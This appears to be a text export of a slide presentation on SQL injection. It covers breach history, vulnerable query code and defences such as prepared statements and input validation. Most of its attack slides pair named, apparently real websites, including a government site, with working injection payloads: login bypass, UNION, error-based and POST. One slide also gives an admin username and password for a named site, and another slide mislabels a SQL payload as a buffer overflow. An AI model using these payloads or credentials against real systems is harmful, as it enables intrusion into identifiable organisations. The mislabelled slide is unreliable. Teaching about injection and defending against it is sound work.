15. How We Integrate
Well that is the real question how we
integrate.. It create a problem when we don‘t
attach app with a database correctly.. Code
is important
16. Contents continued..
Database Attacks
What is a Database Attack
Explanation
OWASP Rating (damage rate)
Destruction of SQL injection
History Reviews
Recent bidding in underground
19. Destruction of SQL Injection
Attack
Heartland Payment Systems
This New Jersey payment processing firm lost
data on tens of millions of credit cards in an
attack in 2009. Around 175,000 businesses
were affected by the theft.
TJX
More than 45 million people had their credit card
details stolen and some experts said the actual
figure was likely to be closer to 94 million.
21. Login on Live Sites
http://www.equinet.ch/fr/gestion/login.php
1' OR '1'='1
http://lionsclubofwashim.co.in/admin.php
1' OR '1'='1
admin.axilbusiness.in
1' OR '1'='1
http://www.anemos.in/admin/
1' OR '1'='1
Query Code
CODE
select username, password from admin
where username='"+txtUserName.Text+"' and password='"+txtPassword.Text+"';
22. Union based attack
http://greenforce.com.pk/page.aspx?page_id=24
+UNION+ALL+SELECT+null,null,@@version,null,null,null,nul
l-- -
http://www.philatourism.com/page.aspx?id=-3 UNION ALL
SELECT table_name,null,null,null,null,null from
information_schema.tables—
http://www.sharan.org.uk/newsdetail.aspx?ID=-7 union all
select '1',null –
Code
select * from tblName where
id=‗‖+RequestQueryString[‗id‘]+‖‘;
23. Error Based Attack
http://www.vdjs.edu.in/CMS/ContentPage.aspx?id=21 and @@version>1-- -
http://www.mission-education.org/resourcelist.cfm?audience_ID=5 and
1=convert(int,@@version)-- -&category_id=2
http://www.grabbbit.com/Product.aspx?console_id=3' and 1=convert(int,(select top 1
column_name from information_schema.columns where table_name='adminlogin'
and column_name not in ('id','userid','password','admin_role_id')))--&type=Preown
http://www.grabbbit.com/admin/login.aspx
userid admin
password grabbbit$
Code
Select column1,column2,column3, from table1 join table2 on table1.column1 =
table2.column1 where id=‗‖+RequestQueryString[‗id‘]+‖‘;
25. POST Sql Injection
url:
http://haryanapolice.gov.in/police/pressreleases/s
earch.asp
Post
text1=rummy'&text2=11/11/2010&SUBMIT=search
Code
select * from tablename where text1=
Request.Form[―text1"].ToString() and text2=
Request.Form[―text1"].ToString();
26. Why Sql Injection Possible
Who is responsible Database or Programmer
Why Not To Blame Database
Database Secure Nature
Lack of awareness
No research base study
Lack of interest
Non professional coders
27. Detection of SQL Injection
Manual Check
Why
How
By Whom
Automated Check
Tools
Scanners
28. Securing From SQL Injection
Learn About it
Firewalls
By Code
Don‘t Disclose any parameter as possible
Giving session user least possible rights
Blacklisting evil keywords for the session user
User input validation
Using prepared statements
29. More on Firewalls
USE Of Firewall
As it is
Customized
Buffer overflows
Null bytes
Difference between a normal user and Hacker
30. Buffer Overflows
Live example
https://www.qmensolutions.com/remote_suppo
rt_packs.php?packs=9%27--%20-
Bypassing from keyword
31. Live Hack Of A Website
http://aquaservices.co.in/
32. Conclusion
Although databases and their contents are
vulnerable to a host of internal and external
threats, it is possible to reduce the attack
vectors to near zero. By addressing these
threats you will meet the requirements of the
most regulated industries in the world.